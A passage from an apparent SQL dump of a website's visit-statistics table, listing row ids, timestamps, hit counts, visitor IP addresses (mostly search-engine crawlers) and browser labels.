'95.216.6.46','other'),(343864,1543634069,1,1,0,0,'54.36.149.80','other'),(343865,1543634396,1,1,0,0,'54.36.148.102','other'),(343866,1543634542,1,1,0,0,'54.36.149.70','other'),(343867,1543634670,1,1,0,0,'8.29.198.26','other'),(343868,1543634834,7,7,0,0,'178.154.244.29','other'),(343869,1543634874,4,4,0,0,'178.154.244.11','other'),(343870,1543634893,1,1,0,0,'54.36.148.182','other'),(343871,1543634921,1,1,0,0,'8.29.198.27','other'),(343872,1543634922,1,1,0,0,'5.45.207.79','other'),(343873,1543634945,1,1,0,0,'213.180.203.9','other'),(343874,1543634947,1,1,0,0,'5.45.207.8','other'),(343875,1543634954,1,1,0,0,'54.36.148.219','other'),(343876,1543635061,2,2,0,0,'40.77.167.136','other'),(343877,1543635082,1,1,0,0,'54.36.149.88','other'),(343878,1543635339,1,1,0,0,'66.249.64.222','chrome'),(343879,1543635456,1,1,0,0,'91.196.178.38','chrome'),(343880,1543635487,1,1,0,0,'66.249.64.195','chrome'),(343881,1543635520,2,2,0,0,'66.249.64.220','chrome'),(343882,1543635606,1,1,0,0,'207.46.13.30','other'),(343883,1543635701,1,1,0,0,'54.36.148.23','other'),(343884,1543636054,1,1,0,0,'66.249.64.218','chrome'),(343885,1543636314,1,1,0,0,'66.249.64.42','chrome'),(343886,1543636409,1,1,0,0,'178.154.244.29','other'),(343887,1543636470,1,1,0,0,'54.36.149.44','other'),(343888,1543636519,1,1,0,0,'54.36.148.83','other'),(343889,1543636524,1,1,0,0,'54.36.148.124','other'),(343890,1543636601,1,1,0,0,'54.36.149.83','other'),(343891,1543636860,1,1,0,0,'54.36.149.19','other'),(343892,1543637250,4,4,0,0,'40.77.167.136','other'),(343893,1543637326,1,1,0,0,'46.229.168.133','other'),(343894,1543637360,1,1,0,0,'54.36.148.131','other'),(343895,1543637582,1,1,0,0,'54.36.149.38','other'),(343896,1543637738,1,1,0,0,'54.36.148.76','other'),(343897,1543637988,1,1,0,0,'54.36.149.68','other'),(343898,1543638264,1,1,0,0,'54.36.149.76','other'),(343899,1543638480,1,1,0,0,'54.36.148.108','other'),(343900,1543638624,1,1,0,0,'66.249.64.220','chrome'),(343901,1543638807,32,32,0,0,'77.221.130.143','other'),(343902,1543638819,10,10,0,0,'77.221.130.143','opera'),(343903,1543639127,1,1,0,0,'54.36.148.87','other'),(343904,1543639180,1,1,0,0,'54.36.148.97','other'),(343905,1543639540,1,1,0,0,'54.36.148.212','other'),(343906,1543639773,1,1,0,0,'37.52.22.139','chrome'),(343907,1543639776,1,1,0,0,'54.36.148.246','other'),(343908,1543640003,1,1,0,0,'54.36.148.221','other'),(343909,1543640208,2,2,0,0,'95.213.141.126','opera'),(343910,1543640459,1,1,0,0,'54.36.148.50','other'),(343911,1543640474,1,1,0,0,'54.36.149.62','other'),(343912,1543640681,1,1,0,0,'54.36.149.63','other'),(343913,1543640707,1,1,0,0,'66.249.64.42','chrome'),(343914,1543640772,1,1,0,0,'54.36.148.129','other'),(343915,1543640797,1,1,0,0,'54.36.148.66','other'),(343916,1543640827,1,1,0,0,'66.249.64.218','chrome'),(343917,1543640866,1,1,0,0,'66.249.64.220','chrome'),(343918,1543641023,1,1,0,0,'46.229.168.132','other'),(343919,1543641024,2,2,0,0,'46.229.168.146','other'),(343920,1543641285,2,2,0,0,'207.46.13.30','other'),(343921,1543641533,1,1,0,0,'54.36.149.1','other'),(343922,1543641541,1,1,0,0,'54.36.148.93','other'),(343923,1543641547,1,1,0,0,'54.36.148.178','other'),(343924,1543641718,1,1,0,0,'54.36.148.163','other'),(343925,1543641927,1,1,0,0,'54.36.148.110','other'),(343926,1543642019,1,1,0,0,'54.36.149.18','other'),(343927,1543642117,1,1,0,0,'66.249.64.222','chrome'),(343928,1543642330,1,1,0,0,'46.229.168.139','other'),(343929,1543642334,1,1,0,0,'46.229.168.140','other'),(343930,1543642378,1,1,0,0,'207.46.13.198','other'),(343931,1543642543,1,1,0,0,'46.229.168.134','other'),(343932,1543642545,1,1,0,0,'46.229.168.129','other'),(343933,1543642565,1,1,0,0,'54.36.148.238','other'),(343934,1543642721,1,1,0,0,'66.249.64.195','chrome'),(343935,1543642722,1,1,0,0,'66.249.64.220','chrome'),(343936,1543642745,2,2,0,0,'66.249.64.218','chrome'),(343937,1543643190,1,1,0,0,'54.36.148.94','other'),(343938,1543643249,1,1,0,0,'66.249.64.40','chrome'),(343939,1543643472,1,1,0,0,'54.36.148.23','other'),(343940,1543643524,1,1,0,0,'54.36.149.59','other'),(343941,1543643576,7,7,0,0,'178.154.244.29','other'),(343942,1543643588,1,1,0,0,'8.29.198.25','other'),(343943,1543643667,1,1,0,0,'54.36.148.239','other'),(343944,1543643852,1,1,0,0,'46.229.168.134','other'),(343945,1543643855,1,1,0,0,'46.229.168.142','other'),(343946,1543643937,1,1,0,0,'54.36.148.27','other'),(343947,1543643971,1,1,0,0,'54.36.148.36','other'),(343948,1543644044,4,4,0,0,'178.154.244.11','other'),(343949,1543644066,1,1,0,0,'141.8.142.103','other'),(343950,1543644240,1,1,0,0,'66.249.64.57','chrome'),(343951,1543644245,1,1,0,0,'66.249.64.40','chrome'),(343952,1543644248,1,1,0,0,'78.156.48.30','other'),(343953,1543644250,1,1,0,0,'66.249.64.220','chrome'),(343954,1543644353,1,1,0,0,'66.249.64.59','chrome'),(343955,1543644354,1,1,0,0,'66.249.64.44','chrome'),(343956,1543644437,1,1,0,0,'66.249.64.222','chrome'),(343957,1543644443,1,1,0,0,'66.249.64.195','chrome'),(343958,1543644444,1,1,0,0,'66.249.64.218','chrome'),(343959,1543644451,1,1,0,0,'5.45.207.79','other'),(343960,1543644524,1,1,0,0,'13.57.233.99','chrome'),(343961,1543644675,5,5,0,0,'178.154.244.29','other'),(343962,1543644876,1,1,0,0,'46.229.168.144','other'),(343963,1543644893,1,1,0,0,'54.36.148.66','other'),(343964,1543644985,1,1,0,0,'54.36.148.10','other'),(343965,1543645051,1,1,0,0,'54.36.149.31','other'),(343966,1543645061,1,1,0,0,'46.211.49.223','chrome'),(343967,1543645087,2,2,0,0,'159.224.169.104','chrome'),(343968,1543645530,1,1,0,0,'8.29.198.26','other'),(343969,1543645573,1,1,0,0,'54.36.149.98','other'),(343970,1543645575,1,1,0,0,'54.36.148.35','other'),(343971,1543645626,1,1,0,0,'178.154.244.29','other'),(343972,1543645638,1,1,0,0,'207.46.13.30','other'),(343973,1543645751,1,1,0,0,'8.29.198.27','other'),(343974,1543646145,1,1,0,0,'54.36.148.225','other'),(343975,1543646337,1,1,0,0,'66.249.64.199','chrome'),(343976,1543646353,1,1,0,0,'66.249.64.220','chrome'),(343977,1543646487,1,1,0,0,'54.36.148.93','other'),(343978,1543646515,1,1,0,0,'54.36.149.35','other'),(343979,1543646603,1,1,0,0,'54.36.148.233','other'),(343980,1543646746,1,1,0,0,'54.36.149.11','other'),(343981,1543646748,1,1,0,0,'54.36.148.236','other'),(343982,1543646766,1,1,0,0,'66.249.64.222','chrome'),(343983,1543646913,1,1,0,0,'46.229.168.144','other'),(343984,1543646917,1,1,0,0,'46.229.168.134','other'),(343985,1543647530,1,1,0,0,'207.46.13.198','other'),(343986,1543647905,1,1,0,0,'66.249.64.195','chrome'),(343987,1543648228,2,2,0,0,'46.211.119.247','chrome'),(343988,1543648260,1,1,0,0,'66.249.64.61','chrome'),(343989,1543648283,1,1,0,0,'66.249.64.40','chrome'),(343990,1543648424,1,1,0,0,'54.36.148.79','other'),(343991,1543648558,1,1,0,0,'54.36.149.99','other'),(343992,1543649439,1,1,0,0,'46.229.168.130','other'),(343993,1543649511,1,1,0,0,'66.249.64.195','chrome'),(343994,1543649532,1,1,0,0,'46.229.168.144','other'),(343995,1543649560,1,1,0,0,'66.249.64.218','chrome'),(343996,1543649634,1,1,0,0,'66.249.64.222','chrome'),(343997,1543649732,1,1,0,0,'46.229.168.138','other'),(343998,1543649736,1,1,0,0,'46.229.168.136','other'),(343999,1543649853,1,1,0,0,'54.36.148.159','other'),(344000,1543649884,1,1,0,0,'54.36.148.81','other'),(344001,1543650038,1,1,0,0,'54.36.149.81','other'),(344002,1543650111,1,1,0,0,'54.36.148.36','other'),(344003,1543650166,2,2,0,0,'178.154.244.29','other'),(344004,1543650210,1,1,0,0,'54.36.148.212','other'),(344005,1543650315,1,1,0,0,'66.249.64.40','chrome'),(344006,1543650726,1,1,0,0,'54.36.149.30','other'),(344007,1543651127,2,2,0,0,'207.46.13.30','other'),(344008,1543651169,1,1,0,0,'54.36.148.31','other'),(344009,1543651214,1,1,0,0,'54.36.148.222','other'),(344010,1543651274,1,1,0,0,'54.36.148.138','other'),(344011,1543651302,1,1,0,0,'54.36.149.76','other'),(344012,1543651345,1,1,0,0,'46.229.168.145','other'),(344013,1543651502,1,1,0,0,'54.36.148.58','other'),(344014,1543651507,1,1,0,0,'54.36.148.107','other'),(344015,1543651519,1,1,0,0,'54.36.148.228','other'),(344016,1543651743,1,1,0,0,'54.36.148.128','other'),(344017,1543651884,1,1,0,0,'54.36.149.54','other'),(344018,1543651919,1,1,0,0,'178.154.244.29','other'),(344019,1543652002,1,1,0,0,'54.36.149.100','other'),(344020,1543652060,3,3,0,0,'66.249.64.42','chrome'),(344021,1543652083,1,1,0,0,'66.249.64.220','chrome'),(344022,1543652116,1,1,0,0,'54.36.149.73','other'),(344023,1543652391,1,1,0,0,'54.36.149.92','other'),(344024,1543652493,1,1,0,0,'66.249.64.59','chrome'),(344025,1543652811,1,1,0,0,'54.36.148.240','other'),(344026,1543652815,1,1,0,0,'54.36.149.44','other'),(344027,1543652952,21,21,0,0,'178.154.244.29','other'),(344028,1543653009,14,14,0,0,'178.154.244.11','other'),(344029,1543653038,1,1,0,0,'46.229.168.139','other'),(344030,1543653070,2,2,0,0,'91.209.11.236','other'),(344031,1543653073,2,2,0,0,'5.45.207.79','other'),(344032,1543653110,1,1,0,0,'54.36.149.28','other'),(344033,1543653263,1,1,0,0,'54.36.149.16','other'),(344034,1543653473,1,1,0,0,'54.36.148.62','other'),(344035,1543653781,2,2,0,0,'207.46.13.30','other'),(344036,1543653852,1,1,0,0,'54.36.148.105','other'),(344037,1543653885,3,3,0,0,'178.154.244.29','other'),(344038,1543653903,1,1,0,0,'54.36.148.241','other'),(344039,1543654092,1,1,0,0,'178.154.244.11','other'),(344040,1543654250,1,1,0,0,'207.46.13.198','other'),(344041,1543654378,1,1,0,0,'66.249.64.222','chrome'),(344042,1543654429,1,1,0,0,'8.29.198.25','other'),(344043,1543654804,1,1,0,0,'5.45.207.79','other'),(344044,1543654875,1,1,0,0,'54.36.148.235','other'),(344045,1543655104,1,1,0,0,'54.36.148.29','other'),(344046,1543655194,1,1,0,0,'195.62.62.246','firefox'),(344047,1543655594,2,2,0,0,'46.211.26.57','chrome'),(344048,1543655596,1,1,0,0,'54.36.148.162','other'),(344049,1543655717,1,1,0,0,'54.36.149.51','other'),(344050,1543655938,1,1,0,0,'54.36.149.55','other'),(344051,1543656056,1,1,0,0,'54.36.149.24','other'),(344052,1543656176,1,1,0,0,'54.36.148.42','other'),(344053,1543656179,12,12,0,0,'54.36.115.76','firefox'),(344054,1543656183,4,4,0,0,'54.36.115.76','other'),(344055,1543656379,2,2,0,0,'8.29.198.27','other'),(344056,1543656492,1,1,0,0,'40.77.167.136','other'),(344057,1543656683,1,1,0,0,'54.36.148.224','other'),(344058,1543657038,1,1,0,0,'54.36.148.167','other'),(344059,1543657409,1,1,0,0,'54.36.148.190','other'),(344060,1543657465,1,1,0,0,'54.36.148.194','other'),(344061,1543657560,1,1,0,0,'54.36.149.42','other'),(344062,1543657768,1,1,0,0,'54.36.149.43','other'),(344063,1543657896,1,1,0,0,'46.229.168.132','other'),(344064,1543658100,3,3,0,0,'173.208.130.202','other'),(344065,1543658184,1,1,0,0,'54.36.148.139','other'),(344066,1543658209,1,1,0,0,'54.36.148.47','other'),(344067,1543658499,1,1,0,0,'46.229.168.133','other'),(344068,1543658895,1,1,0,0,'54.36.148.255','other'),(344069,1543659428,1,1,0,0,'54.36.148.187','other'),(344070,1543659564,1,1,0,0,'54.36.148.120','other'),(344071,1543659573,1,1,0,0,'207.46.13.198','other'),(344072,1543659762,1,1,0,0,'66.249.64.42','chrome'),(344073,1543659820,1,1,0,0,'66.249.64.222','chrome'),(344074,1543659861,1,1,0,0,'54.36.149.90','other'),(344075,1543660048,1,1,0,0,'40.77.167.136','other'),(344076,1543660050,1,1,0,0,'54.36.149.103','other'),(344077,1543660410,1,1,0,0,'54.36.148.150','other'),(344078,1543660679,1,1,0,0,'54.36.148.197','other'),(344079,1543660748,2,2,0,0,'66.249.64.44','chrome'),(344080,1543661018,1,1,0,0,'46.229.168.141','other'),(344081,1543661020,1,1,0,0,'46.229.168.147','other'),(344082,1543661259,1,1,0,0,'54.36.148.103','other'),(344083,1543661262,1,1,0,0,'54.36.148.31','other'),(344084,1543661343,1,1,0,0,'54.36.149.47','other'),(344085,1543661472,1,1,0,0,'54.36.148.243','other'),(344086,1543661664,2,2,0,0,'5.45.207.79','other'),(344087,1543661666,11,11,0,0,'178.154.244.11','other'),(344088,1543661678,1,1,0,0,'54.36.149.77','other'),(344089,1543661774,23,23,0,0,'178.154.244.29','other'),(344090,1543661853,1,1,0,0,'207.46.13.198','other'),(344091,1543662095,1,1,0,0,'40.77.167.138','other'),(344092,1543662107,1,1,0,0,'54.36.148.199','other'),(344093,1543662118,1,1,0,0,'54.36.148.92','other'),(344094,1543662252,1,1,0,0,'54.36.148.116','other'),(344095,1543662351,1,1,0,0,'54.36.148.227','other'),(344096,1543662400,1,1,0,0,'66.249.64.57','chrome'),(344097,1543662550,1,1,0,0,'66.249.64.40','chrome'),(344098,1543662564,1,1,0,0,'95.163.255.62','other'),(344099,1543662566,1,1,0,0,'95.163.255.65','other'),(344100,1543662619,1,1,0,0,'5.45.207.79','other'),(344101,1543662629,1,1,0,0,'54.36.148.149','other'),(344102,1543662651,2,2,0,0,'178.154.244.11','other'),(344103,1543663235,1,1,0,0,'46.229.168.138','other'),(344104,1543663622,1,1,0,0,'54.36.149.46','other'),(344105,1543663698,1,1,0,0,'95.163.255.64','other'),(344106,1543663702,1,1,0,0,'95.163.255.65','other'),(344107,1543663844,1,1,0,0,'178.154.244.11','other'),(344108,1543664031,2,2,0,0,'207.46.13.30','other'),(344109,1543664035,1,1,0,0,'54.36.148.109','other'),(344110,1543664188,1,1,0,0,'66.249.64.40','chrome'),(344111,1543664194,2,2,0,0,'66.249.64.222','chrome'),(344112,1543664377,1,1,0,0,'66.249.64.220','chrome'),(344113,1543664395,1,1,0,0,'54.36.148.196','other'),(344114,1543664525,1,1,0,0,'46.229.168.154','other'),(344115,1543664652,1,1,0,0,'54.36.148.40','other'),(344116,1543664826,1,1,0,0,'54.36.149.87','other'),(344117,1543665017,1,1,0,0,'54.36.148.205','other'),(344118,1543665200,1,1,0,0,'46.229.168.145','other'),(344119,1543665205,1,1,0,0,'46.229.168.135','other'),(344120,1543665279,1,1,0,0,'8.29.198.27','other'),(344121,1543665424,1,1,0,0,'54.36.149.32','other'),(344122,1543665513,2,2,0,0,'108.59.8.80','other'),(344123,1543665613,1,1,0,0,'54.36.148.71','other'),(344124,1543665736,1,1,0,0,'207.46.13.198','other'),(344125,1543666470,1,1,0,0,'54.36.149.107','other'),(344126,1543666513,1,1,0,0,'54.36.148.135','other'),(344127,1543666690,2,2,0,0,'66.249.64.195','chrome'),(344128,1543666709,2,2,0,0,'66.249.64.218','chrome'),(344129,1543666766,1,1,0,0,'54.36.148.70','other'),(344130,1543666873,1,1,0,0,'54.36.148.128','other'),(344131,1543667055,1,1,0,0,'31.43.20.141','chrome'),(344132,1543667095,3,3,0,0,'207.46.13.198','other'),(344133,1543667174,1,1,0,0,'40.77.167.138','other'),(344134,1543667254,1,1,0,0,'8.29.198.25','other'),(344135,1543667333,1,1,0,0,'54.36.148.221','other'),(344136,1543667422,1,1,0,0,'8.29.198.26','other'),(344137,1543667644,1,1,0,0,'54.36.148.22','other'),(344138,1543667777,1,1,0,0,'54.36.149.91','other'),(344139,1543667816,1,1,0,0,'66.249.64.220','chrome'),(344140,1543667983,1,1,0,0,'66.249.64.40','chrome'),(344141,1543667998,1,1,0,0,'54.36.148.218','other'),(344142,1543668046,1,1,0,0,'66.249.64.218','chrome'),(344143,1543668119,1,1,0,0,'54.36.149.16','other'),(344144,1543668238,1,1,0,0,'54.36.149.57','other'),(344145,1543668265,1,1,0,0,'66.249.64.61','chrome'),(344146,1543668285,1,1,0,0,'66.249.64.42','chrome'),(344147,1543668424,1,1,0,0,'40.77.167.136','other'),(344148,1543668526,1,1,0,0,'54.36.148.209','other'),(344149,1543668712,1,1,0,0,'54.36.148.149','other'),(344150,1543668965,1,1,0,0,'54.36.148.175','other'),(344151,1543669102,1,1,0,0,'54.36.148.221','other'),(344152,1543669295,2,2,0,0,'207.46.13.198','other'),(344153,1543669301,1,1,0,0,'46.229.168.139','other'),(344154,1543669452,1,1,0,0,'54.36.148.74','other'),(344155,1543669563,1,1,0,0,'54.36.149.78','other'),(344156,1543669711,1,1,0,0,'66.249.64.222','chrome'),(344157,1543669864,1,1,0,0,'46.229.168.136','other'),(344158,1543669869,1,1,0,0,'46.229.168.150','other'),(344159,1543670092,1,1,0,0,'54.36.148.103','other'),(344160,1543670109,1,1,0,0,'54.36.148.67','other'),(344161,1543670735,2,2,0,0,'91.209.11.236','other'),(344162,1543670761,1,1,0,0,'54.36.148.13','other'),(344163,1543671239,1,1,0,0,'141.8.142.103','other'),(344164,1543671244,6,6,0,0,'178.154.244.29','other'),(344165,1543671353,1,1,0,0,'54.36.148.92','other'),(344166,1543671359,1,1,0,0,'95.108.213.4','other'),(344167,1543671360,4,4,0,0,'178.154.244.11','other'),(344168,1543671444,1,1,0,0,'54.36.148.246','other'),(344169,1543671485,1,1,0,0,'5.45.207.19','other'),(344170,1543671549,1,1,0,0,'54.36.148.30','other'),(344171,1543671698,1,1,0,0,'54.36.148.34','other'),(344172,1543671833,1,1,0,0,'5.45.207.79','other'),(344173,1543672114,1,1,0,0,'54.36.149.87','other'),(344174,1543672367,1,1,0,0,'54.36.149.57','other'),(344175,1543672698,1,1,0,0,'54.36.148.100','other'),(344176,1543672728,1,1,0,0,'46.229.168.148','other'),(344177,1543672738,1,1,0,0,'46.229.168.142','other'),(344178,1543672987,2,2,0,0,'89.163.242.241','opera'),(344179,1543673292,1,1,0,0,'66.249.64.218','chrome'),(344180,1543673350,1,1,0,0,'54.36.148.11','other'),(344181,1543673373,1,1,0,0,'66.249.64.222','chrome'),(344182,1543673538,1,1,0,0,'66.249.64.199','chrome'),(344183,1543673559,1,1,0,0,'66.249.64.220','chrome'),(344184,1543674175,2,2,0,0,'95.134.96.210','chrome'),(344185,1543674188,1,1,0,0,'54.36.148.122','other'),(344186,1543674414,1,1,0,0,'46.229.168.139','other'),(344187,1543674595,1,1,0,0,'207.46.13.198','other'),(344188,1543674716,1,1,0,0,'54.36.149.7','other'),(344189,1543674863,2,2,0,0,'66.249.64.42','chrome'),(344190,1543675094,1,1,0,0,'54.36.149.69','other'),(344191,1543675216,2,2,0,0,'66.249.64.222','chrome'),(344192,1543675728,1,1,0,0,'46.229.168.134','other'),(344193,1543675978,1,1,0,0,'46.229.168.154','other'),(344194,1543676131,1,1,0,0,'8.29.198.27','other'),(344195,1543676246,1,1,0,0,'66.249.75.21','chrome'),(344196,1543676563,1,1,0,0,'46.229.168.147','other'),(344197,1543676697,1,1,0,0,'66.249.75.20','chrome'),(344198,1543676744,1,1,0,0,'66.249.75.142','chrome'),(344199,1543676832,2,2,0,0,'207.46.13.198','other'),(344200,1543676864,1,1,0,0,'54.36.148.210','other'),(344201,1543677065,1,1,0,0,'46.229.168.129','other'),(344202,1543677087,2,2,0,0,'66.249.75.144','chrome'),(344203,1543677160,1,1,0,0,'66.249.75.21','chrome'),(344204,1543677368,1,1,0,0,'54.36.149.72','other'),(344205,1543678109,2,2,0,0,'8.29.198.25','other'),(344206,1543678121,2,2,0,0,'66.249.75.20','chrome'),(344207,1543678241,1,1,0,0,'95.163.255.117','other'),(344208,1543678245,1,1,0,0,'95.163.255.113','other'),(344209,1543678248,1,1,0,0,'40.77.167.136','other'),(344210,1543678661,1,1,0,0,'46.229.168.145','other'),(344211,1543678727,1,1,0,0,'54.36.148.60','other'),(344212,1543678782,2,2,0,0,'66.249.75.21','chrome'),(344213,1543678800,1,1,0,0,'54.36.148.17','other'),(344214,1543679026,1,1,0,0,'54.36.148.219','other'),(344215,1543679109,1,1,0,0,'54.36.148.245','other'),(344216,1543679152,1,1,0,0,'54.36.149.44','other'),(344217,1543679314,1,1,0,0,'66.249.75.15','chrome'),(344218,1543679342,1,1,0,0,'54.36.149.107','other'),(344219,1543679348,1,1,0,0,'178.154.244.29','other'),(344220,1543679519,2,2,0,0,'40.77.167.138','other'),(344221,1543679595,1,1,0,0,'54.36.148.200','other'),(344222,1543679664,2,2,0,0,'54.36.148.119','other'),(344223,1543680336,1,1,0,0,'66.249.75.21','chrome'),(344224,1543680462,1,1,0,0,'46.229.168.149','other'),(344225,1543680466,1,1,0,0,'46.229.168.145','other'),(344226,1543680487,10,10,0,0,'178.154.244.29','other'),(344227,1543680498,5,5,0,0,'178.154.244.11','other'),(344228,1543680757,2,2,0,0,'40.77.167.138','other'),(344229,1543680930,1,1,0,0,'54.36.148.151','other'),(344230,1543681216,5,5,0,0,'5.45.207.79','other'),(344231,1543681287,1,1,0,0,'95.163.255.116','other'),(344232,1543681411,5,5,0,0,'178.154.244.29','other'),(344233,1543681466,1,1,0,0,'54.36.148.61','other'),(344234,1543681520,1,1,0,0,'66.249.75.15','chrome'),(344235,1543681565,4,4,0,0,'178.154.244.11','other'),(344236,1543681588,1,1,0,0,'66.249.75.22','chrome'),(344237,1543681594,1,1,0,0,'66.249.75.20','chrome'),(344238,1543681680,1,1,0,0,'95.163.255.103','other'),(344239,1543681703,2,2,0,0,'37.9.113.148','other'),(344240,1543681744,1,1,0,0,'54.36.149.85','other'),(344241,1543681830,1,1,0,0,'87.250.224.47','other'),(344242,1543681910,2,2,0,0,'95.163.255.115','other'),(344243,1543682194,1,1,0,0,'95.163.255.116','other'),(344244,1543682280,1,1,0,0,'54.36.148.100','other'),(344245,1543682283,1,1,0,0,'54.36.148.28','other'),(344246,1543682293,1,1,0,0,'95.163.255.106','other'),(344247,1543682326,1,1,0,0,'54.36.148.20','other'),(344248,1543682327,1,1,0,0,'54.36.148.73','other'),(344249,1543682388,1,1,0,0,'54.36.148.95','other'),(344250,1543683100,1,1,0,0,'54.36.148.82','other'),(344251,1543683435,1,1,0,0,'54.36.148.123','other'),(344252,1543683458,1,1,0,0,'46.211.67.154','other'),(344253,1543683634,1,1,0,0,'54.36.148.23','other'),(344254,1543683693,1,1,0,0,'66.249.75.22','chrome'),(344255,1543683885,1,1,0,0,'54.36.148.48','other'),(344256,1543684313,1,1,0,0,'66.249.75.20','chrome'),(344257,1543684465,2,1,1,0,'66.249.75.140',''),(344258,1543684581,1,1,0,0,'46.229.168.148','other'),(344259,1543684603,1,1,0,0,'46.229.168.154','other'),(344260,1543684626,2,2,0,0,'207.46.13.30','other'),(344261,1543684657,1,0,1,0,'66.249.75.157',''),(344262,1543684822,1,1,0,0,'46.229.168.137','other'),(344263,1543684872,1,1,0,0,'54.36.148.130','other'),(344264,1543685199,1,1,0,0,'46.229.168.146','other'),(344265,1543685215,1,1,0,0,'54.36.149.11','other'),(344266,1543685337,1,1,0,0,'54.36.148.215','other'),(344267,1543685358,1,1,0,0,'178.154.244.11','other'),(344268,1543685369,1,1,0,0,'54.36.148.57','other'),(344269,1543685578,1,1,0,0,'46.229.168.148','other'),(344270,1543685983,1,1,0,0,'54.36.148.200','other'),(344271,1543686295,2,2,0,0,'178.154.244.11','other'),(344272,1543686308,1,1,0,0,'46.229.168.129','other'),(344273,1543686897,1,1,0,0,'66.249.75.20','chrome'),(344274,1543686972,1,1,0,0,'8.29.198.27','other'),(344275,1543686989,1,1,0,0,'207.46.13.30','other'),(344276,1543687261,1,1,0,0,'54.36.149.20','other'),(344277,1543687386,1,1,0,0,'54.36.149.73','other'),(344278,1543687409,1,1,0,0,'54.36.148.31','other'),(344279,1543687516,1,1,0,0,'95.108.181.75','other'),(344280,1543687762,2,2,0,0,'66.249.75.15','chrome'),(344281,1543687779,2,2,0,0,'66.249.75.21','chrome'),(344282,1543687854,1,1,0,0,'54.36.148.43','other'),(344283,1543688128,1,1,0,0,'54.36.148.182','other'),(344284,1543688205,1,1,0,0,'40.77.167.138','other'),(344285,1543688264,1,1,0,0,'54.36.149.37','other'),(344286,1543688278,1,1,0,0,'54.36.149.101','other'),(344287,1543688515,1,1,0,0,'54.36.149.9','other'),(344288,1543688964,1,1,0,0,'8.29.198.25','other'),(344289,1543689098,1,1,0,0,'8.29.198.26','other'),(344290,1543689258,2,2,0,0,'66.249.75.20','chrome'),(344291,1543689283,1,1,0,0,'54.36.148.86','other'),(344292,1543689376,1,1,0,0,'54.36.148.247','other'),(344293,1543689566,1,1,0,0,'66.249.75.155','chrome'),(344294,1543689589,1,1,0,0,'66.249.75.142','chrome'),(344295,1543689635,2,2,0,0,'91.209.11.236','other'),(344296,1543690025,13,13,0,0,'178.154.244.29','other'),(344297,1543690036,5,5,0,0,'5.45.207.79','other'),(344298,1543690076,1,1,0,0,'54.36.148.90','other'),(344299,1543690079,1,1,0,0,'54.36.148.22','other'),(344300,1543690117,10,10,0,0,'178.154.244.11','other'),(344301,1543690366,1,1,0,0,'178.154.244.65','other'),(344302,1543690369,1,1,0,0,'87.250.224.47','other'),(344303,1543690371,3,3,0,0,'141.8.132.16','other'),(344304,1543690382,1,1,0,0,'141.8.142.103','other'),(344305,1543690404,1,1,0,0,'5.255.253.38','other'),(344306,1543690413,2,2,0,0,'37.9.113.103','other'),(344307,1543690544,1,1,0,0,'87.250.224.64','other'),(344308,1543690570,1,1,0,0,'5.45.207.8','other'),(344309,1543690732,1,1,0,0,'54.36.149.23','other'),(344310,1543690935,1,1,0,0,'54.36.148.199','other'),(344311,1543691036,1,1,0,0,'54.36.149.73','other'),(344312,1543691077,1,1,0,0,'207.46.13.198','other'),(344313,1543691307,1,1,0,0,'66.249.75.16','chrome'),(344314,1543691331,1,1,0,0,'66.249.75.21','chrome'),(344315,1543691395,1,1,0,0,'66.249.75.15','chrome'),(344316,1543691396,3,3,0,0,'178.154.244.29','other'),(344317,1543691425,1,1,0,0,'66.249.75.22','chrome'),(344318,1543691446,1,1,0,0,'66.249.75.144','chrome'),(344319,1543691458,2,2,0,0,'178.154.244.11','other'),(344320,1543691468,1,1,0,0,'54.36.148.203','other'),(344321,1543691518,1,1,0,0,'66.249.75.20','chrome'),(344322,1543691624,1,1,0,0,'54.36.148.237','other'),(344323,1543691639,1,1,0,0,'54.36.149.4','other'),(344324,1543691762,1,1,0,0,'54.36.148.36','other'),(344325,1543691823,1,1,0,0,'46.229.168.148','other'),(344326,1543691827,1,1,0,0,'46.229.168.137','other'),(344327,1543691838,1,1,0,0,'54.36.149.31','other'),(344328,1543692064,1,1,0,0,'54.36.149.12','other'),(344329,1543692224,1,1,0,0,'54.36.149.17','other'),(344330,1543692287,1,1,0,0,'54.36.148.162','other'),(344331,1543692366,1,1,0,0,'66.249.75.142','chrome'),(344332,1543693091,1,1,0,0,'54.36.148.157','other'),(344333,1543693276,1,1,0,0,'54.36.148.59','other'),(344334,1543693280,1,1,0,0,'66.249.75.15','chrome'),(344335,1543693307,1,1,0,0,'66.249.75.20','chrome'),(344336,1543693312,2,2,0,0,'46.211.72.51','chrome'),(344337,1543693342,1,1,0,0,'40.77.167.138','other'),(344338,1543693656,1,1,0,0,'46.229.168.133','other'),(344339,1543693660,1,1,0,0,'46.229.168.145','other'),(344340,1543693675,1,1,0,0,'54.36.148.203','other'),(344341,1543693920,1,1,0,0,'66.249.75.21','chrome'),(344342,1543694181,1,1,0,0,'207.46.13.198','other'),(344343,1543694238,1,1,0,0,'46.229.168.137','other'),(344344,1543694261,1,1,0,0,'54.36.149.90','other'),(344345,1543694346,1,1,0,0,'46.229.168.129','other'),(344346,1543694348,1,1,0,0,'46.229.168.134','other'),(344347,1543694536,1,1,0,0,'54.36.148.123','other'),(344348,1543695045,1,1,0,0,'54.36.148.84','other'),(344349,1543695230,1,1,0,0,'54.36.149.3','other'),(344350,1543695295,1,1,0,0,'46.229.168.150','other'),(344351,1543695298,1,1,0,0,'46.229.168.145','other'),(344352,1543695303,1,1,0,0,'95.163.255.193','other'),(344353,1543695307,1,1,0,0,'95.163.255.166','other'),(344354,1543695368,2,2,0,0,'178.154.244.29','other'),(344355,1543695480,1,1,0,0,'95.163.255.174','other'),(344356,1543695482,1,1,0,0,'95.163.255.171','other'),(344357,1543695707,1,1,0,0,'66.249.75.21','chrome'),(344358,1543696029,1,1,0,0,'54.36.148.36','other'),(344359,1543696384,1,1,0,0,'54.36.149.34','other'),(344360,1543696714,1,1,0,0,'66.249.75.16','chrome'),(344361,1543696733,1,1,0,0,'66.249.75.21','chrome'),(344362,1543697202,1,1,0,0,'66.249.75.22','chrome'),(344363,1543697772,1,1,0,0,'54.36.148.251','other'),(344364,1543697812,1,1,0,0,'8.29.198.27','other'),(344365,1543697971,1,1,0,0,'54.36.148.142','other'),(344366,1543698005,2,2,0,0,'66.249.75.21','chrome'),(344367,1543698250,1,1,0,0,'54.36.148.147','other'),(344368,1543698252,1,1,0,0,'54.36.148.40','other'),(344369,1543698270,1,1,0,0,'178.154.244.11','other'),(344370,1543698287,3,3,0,0,'178.154.244.29','other'),(344371,1543698325,1,1,0,0,'5.45.207.19','other'),(344372,1543698697,1,1,0,0,'207.46.13.198','other'),(344373,1543698867,1,1,0,0